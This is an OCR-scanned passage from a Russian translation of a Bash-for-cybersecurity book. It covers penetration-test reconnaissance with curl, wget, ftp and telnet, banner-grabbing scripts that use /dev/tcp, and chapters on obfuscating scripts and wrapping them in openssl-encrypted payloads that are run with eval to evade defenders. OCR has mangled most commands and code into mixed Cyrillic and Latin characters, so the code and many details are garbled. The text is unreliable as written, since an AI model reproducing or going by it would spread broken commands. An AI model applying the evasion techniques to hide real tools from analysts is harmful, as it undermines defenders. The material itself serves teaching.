Сунь-изы. Искусство войны 


В части Ш мы рассмотрим использование командной строки 
во время тестов на проникновение, чтобы проводить разведку, 
выявлять уязвимости и предоставлять удаленный доступ. 


' Оригинальная цитата: [её уойг рІарѕ Бе Чагк ара ипрепегаЫе аз п12Ъ%, ара \Беп уои тоуе, 


а] Пе а ипаегБоїс. 


Разведка 


Разведка — это, как правило, первый шаг при тестировании на проникновение. 
Основная задача данного этапа — используя все доступные ресурсы, собрать как 
можно больше информации о цели. Нас интересуют такие сведения, как имена, 
адреса электронной почты и номера телефонов, пространство ТР-адресов, открытые 
сетевые порты и используемое программное обеспечение. 


Используемые команды 


В этой главе мы познакомимся с командой #ёр. 


Пр 

Команда #ер предназначена для передачи файлов на ЕТР-сервер и обратно. 
Общие параметры команды 

-п — запретить автоматический вход на сервер. 

Пример команды 


Для подключения к ЕТР-серверу с ІР-адресом 192.168.0.125 напишите следующее: 
ҒЕр 192.168.0.125 
По умолчанию команда р попытается подключиться через ТСР-порт 21. Если вы 


хотите подключиться через другой порт, укажите номер, введя его после ІР-адреса 
хоста. Например, подключимся к порту 50: 


ҒЕр 192.168.0.125 50 


После подключения к ЕТР-серверу для отправки и получения файлов используйте 
интерактивные команды. Чтобы вывести список каталогов, введите команду 15; 
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для перехода из каталога в каталог воспользуйтесь командой сӣ; для передачи 
файлов на ЕТР-сервер применяется команда риё, а для передачи файлов с ЕТР- 
сервера — команда вет. 


Просмотр веб-сайтов 


Для копирования веб-страницы из сети можно использовать команду сиг1. 
Она проста в использовании, но имеет множество дополнительных параметров, 
предоставляющих возможность обработки удаленной аутентификации и сеан- 
совых файлов соове. Обычно вместе с командой сиг1 используется параметр -1, 
позволяющий команде следовать перенаправлениям НТТР при изменении место- 
положения страницы. По умолчанию сиг1 будет выводить необработанный НТМІ- 
код в $4016. Но вывод с помощью параметра -о можно перенаправить в файл: 


сиг1 -Ё -о оцЕриф.Ит1 ИЕр$: //ммм . оге111у. сот 


Параметр -І позволит команде сиг1 получать только НТТР-заголовки, а все осталь- 
ное содержимое страницы игнорировать. Это может быть полезно при попытке 
идентификации версии веб-сервера или операционной системы. В приведенном 
ниже примере можно увидеть, что сервер использует Арасће 2.4.7 и операционную 
систему ОБипи: 


$ сиг1 -ЕТ НЕЕрз$: / /лмм.огеі11у. сот 


НТТР/1.1 200 ОК 

5егуег: Арасһе/2.4.7 (ОБип+и) 

Гаѕ+-МоаіғҒіеа: Ег1, 19 Осі 2018 08:30:02 СМТ 
Сопфеп*-Туре: ёехе/һёт1 

Сасһе-Сопго1: тах-аве=7428 

Ехр1ге$: Егі, 19 Осі 2018 16:16:48 СМТ 

Рае: Ег1, 19 Осі 2018 14:13:00 СМТ 
Соппес+іоп: Кеер-а11\е 


Вы хотите узнать, доступен ли сайт? Перехватите заголовок с помощью сип, 
а затем для поиска кода состояния НТТР 200 используйте команду агер: 


$ сиг1 -115 һёёрѕ: / /имм.огеі11у.сот | егер '200 ОК' 


НТТР/1.1 200 ОК 


К сожалению, сиг1 может извлекать только указанную страницу и не имеет функ- 
ций просмотра содержимого всего сайта или перехода по ссылкам на странице. 
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УСЕТ 


Команда мвеї также предназначена для загрузки веб-страниц, но по умолчанию во 
многих дистрибутивах Глпих она не установлена. В Сі Ваѕћ эта команда тоже от- 
сутствует. Чтобы установить мвеї в дистрибутив Глпах на основе ОеЫап, выполните 
следующие действия: 

зи4о ар+-веф 1п${фа11 мве* 


Одно из главных преимуществ мее перед сиг1 в том, что мее? позволяет зеркально 
отображать или копировать весь веб-сайт, а не просто получить одну страницу или 
файл. При использовании зеркального режима мвеї будет сканировать сайт по ссыл- 
кам и загружать содержимое каждой найденной страницы в указанный каталог: 


мее -р -т -К -Р ./тм1ггог Ирз: //ммм. дірайе1. сот 


Параметр -р используется для загрузки файлов, связанных с веб-сайтом, таких как 
каскадные таблицы стилей (С5$) и файлы изображений; параметр -т включает ре- 
жим зеркального отображения, параметр -К преобразует ссылки на загруженные 
страницы в локальные пути; а параметр -Р указывает путь (то есть каталог), в кото- 
ром сохраняется зеркальный веб-сайт. 


Автоматический захват баннера 


При подключении к серверу иногда появляется информация о приложении веб- 
сервиса или об операционной системе — баннер. При подключении к веб-серверу 
О’КеШу в заголовке НТТР можно увидеть такой баннер операционной системы: 


НТТР/1.1 200 ОК 

Ѕегмег: Арасһе/2.4.7 (ЦБипфи) 

Гаѕ+-МоаіҒіеа: Ег1, 19 Осі 2018 08:30:02 СМТ 
Сопфеп*-Туре: ёехе/һёт1 

Сасһе-СопЁго1: мах-аре=7428 

Ехр1ге$: Егі, 19 Осі 2018 16:16:48 СМТ 

рае: Егі, 19 Осі 2018 14:13:00 СМТ 
Соппестіоп: Кеер-а11\уе 


Ценной считается информация о том, в какой операционной системе работает по- 
тенциальная цель. Получив эту информацию, вы можете узнать, какие уязвимости 
могут существовать в данной системе. Впоследствии эти уязвимости можно ис- 
пользовать на начальном этапе жизненного цикла атаки. 


Баннеры обычно отображают несколько типов систем, включая веб-серверы, ЕТР- 
серверы и серверы протокола ЗМТР (Ѕітріе Маі Тгапѕѓег Ргоќосо!). В табл. 13.1 
показаны сетевые порты, которые обычно используются этими службами. 
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Таблица 13.1. Стандартные порты 


Протокол сервера Номер порта 
ЕТР ТСР 21 
ЗМТР ТСР 25 
НТТР ТСР 80 


В большинстве операционных систем баннер может быть изменен системным 
администратором. Баннер можно удалить полностью либо заставить его сооб- 
щать ложную информацию. Его также можно рассматривать как индикатор типа 
операционной системы или приложения, но полностью ему доверять нельзя. 


В главе 9 мы рассматривали, как с помощью сценария ѕсап. ѕћ сканировать сетевой 
порт. Этот сценарий можно расширить таким образом, что при каждом обнаруже- 
нии узла с одним из открытых портов (ЕТР, $МТР или НТТР) он будет пытаться 


получить и сохранить баннер сервера. 


Вы уже видели, как можно использовать команду сиг1 для захвата заголовка 


НТТР, который может содержать баннер: 


сиг1 -ЁТ ИЕр$: //ммм.оге111у . сот 


Для захвата баннера с ЕТР-сервера можно использовать команду р: 


$ РЁр -п 192.168.0.16 


Соппес+еа о 192.168.0.16. 
220 (ҮЅҒТРа 3.0.3) 
ҒЕр> 


Параметр -п применяется, чтобы команда #+р не пыталась автоматически войти 
на сервер. Чтобы после подключения закрыть ЕТР-соединение, с терминала +&р> 


введите команду ач1*. 


Самый простой способ перехватить баннер с ЗМТР-сервера — использовать 


команду +е1пеї с сетевым портом 25: 
$ ке1пе{ 192.168.0.16 25 


Соппес+еа фо 192.168.0.16 
Еѕсаре сһағас+ег 15 '^]'. 


220 1оса1һоѕЁ.1оса1аӢотаіп ЕЅМТР Роѕ%#іх (Убипфи) 
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Команда е1пе+ доступна в большинстве версий Глпих, но в СЁ Ваѕћ и во многих 
версиях \іпаоҳѕ она отсутствует. В этих случаях, чтобы получить аналог коман- 
ды +е1пет, вы можете написать небольшой сценарий, используя дескриптор Баѕћ 
/аеу/+&ср. 


В примере 13.1 показано, как для подключения к 5МТР-серверу и захвата баннера 
использовать файловый дескриптор БаѕЬ ТСР. 


Пример 13.1. ѕтірсоппесі.$ћ 
#1/ріп/баѕћ - 


# 

# Ваѕһ и кибербезопасность 

# ѕмерсоппес+. $И 

# 

# Описание: 

# Подключение к 5МТР-серверу и печать приветственного баннера 
# 

# Использование: 

# этЕрсоппесе.$П <һоѕЁ> 

# <һоѕ> 5МТР-сервер для соединения 
# 


ехес 3<>/4е\/&ср/"$1"/25 
есһо -е 'аоіЄ\г\п' >83 
са <&3 


При запуске этого сценария мы получим следующий вывод: 
$ ./ѕтЕрсоппес+.ѕһ 192.168.0.16 


220 1оса1һоѕі.1оса1аотаіп ЕЅМТР Роѕ&Ғіх (Обипи) 


В примере 13.2 показано, как это все объединить для автоматического извлечения 
баннеров с серверов ЕТР, $МТР и НТТР. 


Пример 13.2. Баппегадгаббег.5ћ 


#1/ріп/баѕћ - 

# 

Вай и кибербезопасность 
БаппегзгабБег. ѕћ 


Описание: 
Автоматическое извлечение баннеров с НТТР-, $МТР- и ЕТР-серверов 


Использование: . /баппегвгаббег.ѕћ һоѕ&пате [зсгафсН+11е] 
ѕсгасһҒі1е используется во время обработки, но удаляется; 
по умолчанию: "ѕсгаёсһ.Ғі1е" или сгенерированное имя 


СЕЕ: 306: 60Е06:36-3 
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# 

Ғипс+іоп іѕрогёореп () 

{ 
(( 6 < 2 )) && гефиги 1 
1оса1 һоѕї рогі 
ћоѕ1=$1 
рогі=$2 
есһо >/еу/пи11 2>&1 < /аеу/+ср/${һоѕ+}/%{рогї} 
геёигп $? 

} 

Ғипс+іоп с1еапир () 

{ 
гт -Е "Ф5СААТСН" 

} 

АТНО$Т="$1" 

ЅСКАТСН="$2" 

И -2 $2 ]] 

+һеп 
1+ [[ -п %(%уре -р етрғі1е) ]] 
ёһеп 

ЅСКАТСН=$ (Ёетрғі1е) 
е1ѕе 
ЅСКАТСН= ' ѕсгаёсћ.#11е' 

1 

1 


{гар с1еапир ЕХТТ 
фоисй "$$СВАТСН" 


1+ 15рогфореп $АТНОЅТ 21 # ЕТР 
+һеп 
# например, ҒЄр -п $АТНОЅТ 
ехес 3<>/4е\/&ср/${АТНО$Т}/21 
есһо -е 'ади1\г\п' >83 
са <83 >> "$5СВАТСН" 


1 
1+ іѕрогореп $АТНОЅТ 25 # ЅМТР 
ъһеп 
# например, +е1пее $АТНОЅТ 25 
ехес 3<>/4е\/&ср/${АТНО$Т}/25 
есһо -е 'ади1\г\п' >&3 
саф <&3 >> "ФЅСКАТСН" 
11 
1+ іѕрогореп $АТНОЅТ 80 # НТТР 
ъһеп 
сиг1 -11$ "Һерѕ://Ф{АТНОЅТ}" >> "$$СВАТСН" 
11 


са "Ф5СААТСН" 


Фоо 
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Как было показано в главе 9, этот сценарий при попытке открытия или при 
удачном открытии ТСР-порта на хосте также использует специальное имя файла 
/аем/&ср и номер порта, указанный как часть этого имени файла (например, /аеу/ 
{ср/127.0.0.1/631). 


© Сценарий начинается функцией іѕрогїореп, которая проверяет ошибки, что- 
бы убедиться, что нам было передано правильное количество параметров. Хотя 
в программировании полезно проверять ошибки, в предыдущих сценариях мы 
этого не делали. Проверки не проводились, чтобы в процессе обучения избежать 
чрезмерного усложнения сценариев. При реальном использовании в производ- 
ственных средах обязательно проводите такую проверку ошибок, чтобы при от- 
ладке сэкономить время. 


Ө Это основа всего сценария. Здесь мы можем посмотреть, открыт ли порт. На пер- 
вый взгляд три перенаправления могут показаться странными. Но давайте их раз- 
берем. Команда есһо без аргументов выведет на экран новую строку — пусть нас это 
не беспокоит. Мы ее отфильтровываем и отправляем в /деу/пи11. Все остальные 
сообщения об ошибках (5 4етг) также будут направлены в этот каталог. По суще- 
ству, нам нужно только перенаправить ввод. Вы можете подумать, что команда 
есһо ничего не читает из ѕіп. Тем не менее БазВ попытается открыть файл, на- 
званный как перенаправление $4, и в зависимости от результата (получилось 
открыть или нет) мы сможем определить состояние порта — открыт или закрыт. 
Если перенаправление не получится, общая команда также не будет выполнена 
и, следовательно, переменной $? будет присвоено значение, отличающееся от нуля. 
При успешном перенаправлении переменной $? будет присвоено значение ё. 


© Ловушка устанавливается так, чтобы при выходе из сценария с помощью функ- 
ции очистки наш рабочий файл был обязательно удален. 


Ө Теперь с помощью команды +оисћһ мы создаем пустой файл и убеждаемся, что он 
находится в целевой системе и готов к использованию. Если в файл ничего не за- 
писывать, никакой ошибки не будет (см. ®). 


© Эта проверка использует нашу вспомогательную функцию, в результате чего 
мы можем увидеть, открыт ли порт ЕТР (21) на хосте, имя которого было указано 
пользователем при вызове сценария. 


© Здесь, чтобы дескриптор файла 3 был открыт для чтения и записи (<>), исполь- 
зуется команда ехес. Файл, к которому мы обращаемся, — это стандартный порт 
ЕТР номер 21. 


Ө Чтобы ЕТР-порт не оставлять открытым, записывается короткое сообще- 
ние. Поскольку в наши намерения не входит передача файлов, мы даем коман- 
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ду на выход. Параметр -е указывает команде есһо интерпретировать еѕсаре- 
последовательность (\г\п) как символы, необходимые сокету ТСР для завершения 
строки. 


Ө Здесь происходит считывание из файлового дескриптора З нашего ТСР- 
соединения и запись данных, возвращенных в файл $СВАТН. Обратите внимание 
на использование символов >>, определяющих, что файл не перезаписывается, 
а добавляется. В первый раз, когда мы выполняем запись в файл, этого делать 
не нужно. Добавление файла предусмотрено на случай, если понадобится переупо- 
рядочить код (это параллельная конструкция, когда все перенаправления в $5СКАТН 
выглядят одинаково). 


© Поскольку для НТТР-соединения и добавления вывода в файл ѕсгаєсһ мы можем 
использовать команду сиг1, /аем/ср нам не понадобится. 


© На последнем этапе нам предстоит сбросить весь найденный вывод. Если бы 
ни один из портов не был открыт, в файл зсгафсН ничего не было бы записано. 
В начале мы специально с помощью команды Єоисћһ создаем новый файл, чтобы 
после объединения, выполняемого командой саќ, не появлялась ошибка «Файл 
не найден». 


Выводы 


Разведка — один из самых важных шагов в любом тесте на проникновение. 
Чем больше данных о цели вы получите, тем легче будет запустить успешный 
эксплойт. При выполнении разведки будьте осторожны, чтобы слишком рано 
не раскрыть свои карты. Постарайтесь узнать, какие методы разведки могут быть 
обнаружены целью, а какие — нет. 


В следующей главе мы рассмотрим методы обфускации сценариев, которые 
делают скрипты более трудными для анализа или выполнения, если они будут за- 
хвачены сетевыми защитниками (еѓепЯег). 


Упражнения 


1. Создайте конвейер команд, использующих для извлечения веб-страницы коман- 
ду сиг1, а затем выведите на экран все адреса электронной почты, найденные на 
этой странице. 
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2. Измените сценарий ѕтёрсоппесё. ѕһ так, чтобы сетевой порт, использу- 
емый для подключения, задавался аргументом командной строки (например, 
./зтЕрсоппесе. $1 192.168.0.16 25). 


3. Измените сценарий Баппегрга бег . ѕһ так, чтобы вместо одного имени хоста, 
указанного в командной строке, он считывал из файла список нескольких це- 
левых [Р-адресов. 


4. Измените сценарий Баппегрга Бег. ѕћ так, чтобы список всех обнаруженных 
баннеров выводился в одном файле в виде таблицы НТМГ. 


Чтобы просмотреть дополнительные ресурсы и получить ответы на эти вопросы, 
зайдите на сайт ВЁрв: //\мммм/.гарАсубегор$.сот/. 


Обфускация сценария 


Сценарий Баз может быть легко прочитан человеком — это определено особен- 
ностью языка. Желательно, чтобы большинство приложений легко читались, но 
для сценариев тестирования на проникновение это неприемлемо. В большинстве 
случаев при выполнении атак не требуется, чтобы цель могла легко прочесть или 
перенастроить применяемые инструменты. Для затруднения чтения и анализа кода 
можно использовать обфускацию. 


Обфускация, или запутывание, — это набор методов, позволяющих намеренно 
сделать сценарий, инструмент, приложение или файл трудным для чтения или 
понимания. Существует три основных способа обфускации сценариев: 


О обфускация синтаксиса; 


О обфускация логики; 


О кодирование или шифрование. 


В следующих разделах мы подробно рассмотрим каждый из них. 


Используемые команды 


Для преобразования данных мы воспользуемся командой Базе64, а для выполнения 
произвольных командных операторов — командой е\а1. 


раѕеб4 


Команда баѕеб4 предназначена для кодирования данных в формате Ваѕеб4. 


Дополнительные сведения о стандарте кодирования двоичных данных Ваѕеб4 вы 
найдете по адресу Һіёр://6іє.1у/2%/х5У0ОС. 
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Общие параметры команды 

-а — декодировать данные, закодированные в формате Ваѕеб4. 
Пример команды 

Для кодирования строки в Вазеб А можно написать следующее: 
$ есһо 'Варіа Субегѕесигі+у Орз' | Базеб4 

ИтРимам0503117Х972\№1 ст19еВРснмк 

Для декодирования из ВазебА: 

$ есһо 'ОтЕмам0203112Х7224№1ст1деѕВРсНМКк' | Базеб4 -а 


Каріа Сурегѕесигіёу 0рѕ 


еуа| 


Команда еуа1 выполняет аргументы, заданные ей в контексте текущей оболочки. 
Например, команде еуа1 можно предоставить команды оболочки и аргументы 
в формате строки и еуа1 выполнится так, как если бы это была команда оболочки. 
Это особенно полезно в сценарии при динамическом построении команд оболочки. 


Пример команды 


В этом примере команда оболочки динамически объединяется с аргументом, после 
чего с помощью команды еуа1 в оболочке выполняется результат: 

$ соттап4Опе="есйо" 

$ соттападге="Не110о Мог1а" 


$ еуа1 "$соттапаОпе $соттападАге" 


Не11о Мог1а 


Обфускация синтаксиса 


Обфускация синтаксиса сценария направлена на то, чтобы затруднить чтение — 
другими словами, сделать так, чтобы сценарий был испорчен и из-за этого труд- 
ночитаем. Для написания такого сценария не используйте свои навыки написания 
хорошо отформатированного и легкочитаемого кода. 


Начнем с правильного хорошо отформатированного кода (пример 14.1). 
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Пример 14.1. геайабіе.ѕћ 
#1/6ріп/Баѕһ - 


# 
# Ваѕһ и кибербезопасность 
# геадаб1е.5һ 
# 
# Описание: 
# Простой скрипт для обфускации 
# 
ЇР [[ $1 == "Жеѕ+" 1] 
Еһеп 
есһо "Феѕііпе" 
е1ѕе 
есһо "поё +еѕёіпе" 
11 


есһо "ѕоте соттапа" 
есһо "апоёһег соттапа" 


В Баз6 вы можете поместить весь сценарий в одну строку. Обратите внимание: 
вместо того чтобы начинать каждую команду с новой строки, введите весь сценарий 
одной строкой, разделяя команды точкой с запятой (;). В примере 14.2 показан 
тот же сценарий, записанный в одну строку (в книге он будет напечатан в две стро- 
ки, так как в одну строку сценарий на странице не помещается). 


Пример 14.2. опеііпе.ѕћ 


#!/61п/Базй - 

# 

Ваѕһ и кибербезопасность 
опе1іпе. $И 


Описание: 
Пример обфускации однострочного скрипта 


Е 


1+ [[ $1 == "+еѕ+" ]]; ©һеп есһо "4е$1т8"; е15е есһо "по %е51т8"; №1; есһо "зоте 
соттапа"; есһо "апоёһег соттапа" 


В примере 14.2 сценарий из примера 14.1, записанный одной строкой, выглядит 
не так уж и плохо. Но представьте себе сценарий, состоящий из нескольких сотен 
или нескольких тысяч строк кода, который мы записали в одну строку. В этом 
случае было бы затруднительно понять такой сценарий без переформатирования. 


Другой метод обфускации синтаксиса — сделать имена переменных и функций 
как можно более невзрачными и не привлекающими к себе внимания. Кроме того, 
имена для различных типов и областей можно использовать повторно. В приме- 
ре 14.3 показан образец. 
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Пример 14.3. ѕупѓиѕсаќе.5ћ 


#1/ріп/баѕћ - 

# 

# Ваѕһ и кибербезопасность 

# ѕупҒиѕса+е. п 

# 

# Описание: 

# Пример обфускации синтаксиса скрипта 


# 

а () © 

{ 
1оса1 а="Ёоса1 \Маг1аб1е а" [2] 
есһо "Фа" 

} 

а="С1ора1 Магіаб1е а" © 

есһо "Фа" 


а 

Пример 14.3 включает три различных элемента: 
© функцию с именем а; 

@ локальную переменную с именем а; 

Ө глобальную переменную с именем а. 


Применение трудноопределимых соглашений об именах и, где это возможно, по- 
вторное использование имен затрудняют анализ кода, особенно при больших его 
объемах. Чтобы сделать код еще более запутанным, вы можете объединить этот 
метод с ранее описанной техникой размещения всего кода в одной строке: 


#1!/61п/Ба$й - 
а(){ 1оса1 а="Іоса1 \Маг1аб1е а";есһо "$а"; }; а="С1оба1 \Маг1аб1е а" ;есһо "$а";а 


Наконец, при обфускации синтаксиса сценария обязательно удалите все коммен- 
тарии. Не нужно давать подсказки аналитику, занимающемуся разработкой кода. 


Обфускация логики 


Другой метод заключается в том, чтобы запутать логику сценария так, чтобы ее 
было трудно понять. Сценарий выполняет требуемую функцию, но делает это 
окольным путем. При применении этого метода действительно уменьшается 
эффективность данного сценария и увеличивается его размер. 
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Вот несколько приемов, которыми можно воспользоваться для обфускации логики: 


О используйте вложенные функции; 
О добавьте функции и переменные, которые не вредят функциональности сценария; 


О напишите операторы 1+ с несколькими условиями, где только одно условие 
может иметь верное значение; 


О используйте вложенные операторы 1+ и циклы. 


В примере 14.4 показан сценарий, реализующий некоторые логические методы 
обфускации. Просмотрите его и, не читая пояснений, попробуйте понять, что он 
делает. 


Пример 14.4. Іодѓиѕсаїе.ѕћ 
#!/61п/Ба$й - 


# 
# Ваѕһ и кибербезопасность 
# Товфизсафе. ѕһ 
# 
# Описание: 
# Пример запутывания логики 
# 
+="$1" © 
а() ( 
Ь() 
{ 
+="$(($++5))" Ө 
8="$(($1+7))" Ө 
с Ө 
} 
ь Ө 
) 
с() ( 
9() 
{ 


&="$(($5-$Е))" ® 
+="$(($+-2))" Ф 
есһо "$+" Ф 


} 
+="$(($+-3))" Ө 
а © 

) 


+="$( ($++$2))" Ө 
© 


а 
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Вот построчное объяснение того, что делает данный сценарий. 
© Значение первого аргумента хранится в переменной +. 


Ө Значение второго аргумента добавляется к текущему значению +, и результат 
сохраняется в +. 


© Вызывается функция а. 

Ө Вызывается функция Ь. 

© Добавляет 5 к значению + и сохраняет результат в +. 

Ө Добавляет 7 к значению + и сохраняет результат в переменной р. 
@ Вызывается функция с. 

Ө Вычитает З из значения + и сохраняет результат в +. 

© Вызывается функция 4. 

© Вычитает значение + из значения в и сохраняет результат в в. 

Ф Вычитает 2 из значения + и сохраняет результат в +. 

Ф Выводит на экран значение +. 


Итак, что же делает сценарий в целом? Он просто принимает два аргумента ко- 
мандной строки и складывает их. Весь сценарий может быть заменен следующей 
строкой: 


есһо "$(($1+$2))" 


Сценарий применяется вложенные функции, которые не делают ничего, кроме 
вызова дополнительных функций. Используются также бесполезные вычисления 
и переменные. Несколько вычислений выполняются с переменной в, но это никак 
не влияет на вывод сценария. 


Существуют неограниченные способы запутать логику вашего сценария. Чем более 
запутанным будет сценарий, тем сложнее окажется его анализ. 


Обфускация синтаксиса и логики, как правило, выполняется после того, как сцена- 
рий написан и протестирован. Чтобы упростить обфускацию, подумайте о создании 
скрипта, который будет выполнять запутывание других сценариев. 


После обфускации обязательно протестируйте свои сценарии, чтобы убедиться, 
что они правильно работают. 
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Шифрование 


Один из самых эффективных способов запутать сценарий — зашифровать его 
с помощью оболочки. Это не только затрудняет анализ кода — если все сделано 
правильно, злоумышленник даже не сможет запустить скрипт при отсутствии 
подходящего ключа. Однако такой метод достаточно сложен. 


Криптографический учебник для начинающих 


Криптография — это наука о методах обеспечения целостности данных, когда 
данные не могут быть прочитаны посторонними лицами. Это одна из старейших 
форм информационной безопасности, которой более тысячи лет. 


Криптографическая система, или криптосистема, состоит из пяти основных ком- 
понентов. 


О Обычный текст — оригинальное сообщение, которое требуется зашифровать. 


О Функция шифрования — метод, используемый для преобразования исходного 
незашифрованного сообщения в его безопасную, непонятную для посторонних 
форму. 

О Функция расшифровки — метод, используемый для преобразования зашифро- 

ванной информации в первоначальную понятную форму. 


О Криптографический ключ — секретный код, используемый функцией для ши- 
фрования или дешифрования. 


О Зашифрованный текст — зашифрованное сообщение. 
Шифрование 


Шифрование — это процесс преобразования исходного сообщения (открытого 
текста) в его безопасную (непонятную) форму, или шифротекст. Для шифрования 
требуется ключ, который должен храниться в секрете и быть известен только лицу, 
выполняющему шифрование, и предполагаемым получателям сообщения. После 
шифрования результирующий зашифрованный текст станет нечитаемым. Прочи- 
тать сообщение сможет только тот, у кого есть соответствующий ключ. 


Расшифровка 


Расшифровка — это процесс преобразования зашифрованного сообщения (шиф- 
ротекста) в открытый читаемый текст. Как и в случае с шифрованием, для расши- 
фровки сообщения требуется соответствующий ключ. Зашифрованное сообщение 
не может быть расшифровано без использования соответствующего ключа. 
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Криптографический ключ 


Криптографический ключ, используемый для шифрования открытого текстового 
сообщения, имеет решающее значение для общей безопасности системы. Ключ 
должен быть защищен, всегда оставаться секретным и передаваться только тем, 
кому предназначено зашифрованное сообщение. 


Современные криптосистемы имеют ключи длиной от 128 до 4096 бит. Как пра- 
вило, чем больше размер ключа, тем сложнее взломать защиту криптосистемы. 


Шифрование сценария 


Шифрование используется для защиты основного (или внутреннего) сценария, по- 
этому он не может быть прочитан третьей стороной без соответствующего ключа. 
При шифровании будет создан другой сценарий, называемый оболочкой, который 
содержит зашифрованный сценарий, хранящийся в переменной. Основная цель 
сценария-оболочки — расшифровать зашифрованный внутренний сценарий и вы- 
полнить это действие только в том случае, если будет предоставлен правильный 
ключ. 


Первым шагом в этом процессе станет создание сценария, который требуется 
зашифровать. Сценарий, который мы используем для этой цели, показан в при- 
мере 14.5. 


Пример 14.5. іппегѕсгірі.5ћ 


есһо "Тһіѕ 15 ап епсгурёеа ѕсгірі" 
есһо "гиппіпе ипате -а" 
ипате -а 


После того как вы создали такой сценарий, вам нужно его зашифровать. Для этого 
можно использовать инструмент ОрепЅ51. По умолчанию Ореп5 51. доступен 
во многих дистрибутивах Глпах и входит в состав СЁ Ваѕћ. В этом случае мы 
задействуем алгоритм А4уапсеа ЕпсгурНоп Збап4агА (АЕ$), который считается 
алгоритмом симметричного ключа, когда один и тот же ключ применяется как 
для шифрования, так и для дешифрования. Чтобы зашифровать файл, напишите 
следующее: 


ореп$$1 аеѕ-256-сбс -Базеб4 -1п іппегѕсгірё.ѕһ -оч{ іппегѕсгірі.епс 
-раѕѕ ра$$:тузесгее 


Аргумент аеѕ-256-сбс указывает 256-разрядную версию АЕЅ. Параметр -іп указы- 
вает файл для шифрования, а параметр -ои — файл, в который будет выводиться 
зашифрованный текст. Параметр -баѕеб4 говорит о том, что выходные данные 
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должны быть закодированы ВазебА — стандартом кодирования данных с помощью 
только 64 символов АЅСП. Кодировка Ваѕеб4 важна из-за способа, с помощью 
которого зашифрованный текст позже будет расшифрован. Наконец, опция -раѕѕ 
используется для указания ключа шифрования. 


Вывод из Ореп551, который является зашифрованной версией сценария іп- 
пегѕсгір+. ѕһ, выглядит следующим образом: 


О2Е5аСсУКХ18МУроуРЕсуууАо2 ЈН53+јг21Р12М9хКһ20+им2ргКҺКВВииві х2р7т 
МоЈодхё2Х7КІҺАТЅ0Мдеге1С+к2ЕхЕКурАҺ9Мп2М3№ӘНХҒЅМ№ио9ҮҒҮр+15рохХЕСРа 


Создание оболочки 


Теперь, когда внутренний сценарий зашифрован и представлен в формате Ваѕеб4, 
вы можете написать для него оболочку. Основная задача оболочки в том, чтобы 
сначала расшифровать внутренний сценарий (при наличии соответствующего 
ключа), а затем выполнить. 


В идеале расшифровка и выполнение сценария должны происходить в оперативной 
памяти. Следует избегать записи незашифрованного сценария на жесткий диск, 
так как позже его могут найти и проанализировать посторонние. Такой сценарий 
оболочки показан в примере 14.6. 


Пример 14.6. угаррег.5ћ 


#!/61п/Базй - 

# 

Ваѕһ и кибербезопасность 
мгаррег. ѕћ 


Описание: 
Пример выполнения зашифрованного «обернутого» скрипта 


Использование: 
мгаррег. ѕћ 
Ввести пароль при появлении запроса 


{++ 


епсгурфед= 'О2ЕѕаС\УКХ18АУроуРЕсуууАо27Н53+јг21Р12М9ХКһ20им2ргКҺКВВииеі х2р7т 
МоЈодхё2+Х7КіҺАТЅ0\дБвге1С+К2ЕхКурАҺӘ№п2МенХҒ5№ио9ҮҒҮр+15рохЕСбРа ® 


геад -ѕ мога Ө 


іппегѕсгірё=%(есһо "фепсгурёеа" | орепѕ51 аез-256-сЬс -Баѕеб4 -ӣ -раѕ5 
раѕѕ:"%мога") Ө 


еуа1 "$іппегѕсгірі" Ө 
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© Это зашифрованный внутренний сценарий, хранящийся в переменной епсгурќеа. 
Причина, по которой ранее мы кодировали вывод Ореп5 51. в Ваѕеб4, состоит в том, 
что он может быть включен в сценарий игаррег. Н. Если ваш зашифрованный 
сценарий очень большой, вы можете сохранить его в отдельном файле. Но в этом 
случае вам нужно будет загрузить в целевую систему два файла. 


Ө Здесь в переменную считывается ключ расшифровки. Чтобы пользовательский 
ввод не отображался на экране, используется параметр -5. 


Ө Данный конвейер команд передает в Ореп5 ТГ. зашифрованный сценарий для 
расшифровки. Результат сохраняется в переменной іппегѕсгірї. 


Ө С помощью команды еуа1 начинается выполнение кода, сохраненного в пере- 
менной 1ппег$сг1 ре. 


В самом начале выполнения программы пользователю будет предложено ввести 
ключ. Если он введет соответствующий ключ (тот же ключ, который использовался 
при шифровании), внутренний сценарий будет расшифрован и выполнен: 


$ ./мгаррег.$П 


Тһіѕ 15 ап епсгурфеЯ ѕсгір+ 
гиппіпе ипате -а 
МІМСМ64_ №Т-6.3 Музуз{ет 2.9.0(0.318/5/3) 2017-10-05 15:05 х86 64 Мѕуѕ 


Шифрование имеет два существенных преимущества перед обфускацией синтак- 
сиса и логики. 


о Если используется хороший алгоритм шифрования и достаточно длинный 
ключ, этот способ шифрования математически безопасен, а зашифрованная 
информация практически не подвержена несанкционированному доступу. 
Методы обфускации синтаксиса и логики не обеспечивают полную защиту 
хранящейся или передаваемой информации и только заставляют аналитика 
тратить больше времени на анализ сценария. 


О Тот, кто, не зная правильного ключа, попытается реконструировать внутренний 
сценарий, не сможет даже выполнить его. 


Недостаток этого метода шифрования заключается в том, что выполняемый сце- 
нарий в незашифрованном виде сохраняется в оперативной памяти компьютера. 
Незашифрованный сценарий может быть извлечен из оперативной памяти 
компьютера с помощью соответствующих методов криминалистической экс- 
пертизы. 
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Создание собственного метода криптографии 


Предыдущий метод шифрования отлично работает, если в целевой системе уста- 
новлен Ореп551.. Но что делать, если его там нет? Вы можете установить Ореп551. 
(но это действие может быть замечено системным администратором целевой систе- 
мы и возрастет операционный риск) или же создать внутри сценария собственную 
реализацию криптографического алгоритма. 


В большинстве случаев не стоит создавать собственный криптографический 
алгоритм или даже пытаться реализовать существующий, например АЕЅ. Вместо 
этого лучше использовать общепринятые алгоритмы, которые были проверены 
криптографическим сообществом. 


В данном случае мы будем реализовывать алгоритм только для производственной 
необходимости и для того, чтобы продемонстрировать фундаментальные крипто- 
графические принципы. Здесь следует учесть, что этот алгоритм небезопасен, 
а информация зашифрована плохо. 


Алгоритм, который мы будем использовать, состоит из нескольких основных 
шагов и прост в реализации. Это основной потоковый шифр, который использует 
генератор случайных чисел для создания ключа той же длины, что и обычный, 
подлежащий шифрованию текст. Далее каждый байт (символ) обычного текста 
пропускается через операцию исключающего ИЛИ (метод ХОК) с соответству- 
ющим байтом ключа (случайным числом). Вывод представляет собой зашифро- 
ванный шифротекст. Таблица 14.1 иллюстрирует использование метода ХОК для 
шифрования. 


Таблица 14.1. Пример шифрования 


Обычный текст е с в о 
АЅСП (шестнадцатеричный) 65 63 68 6Е 
Ключ (шестнадцатеричный) ас 27 р 49 
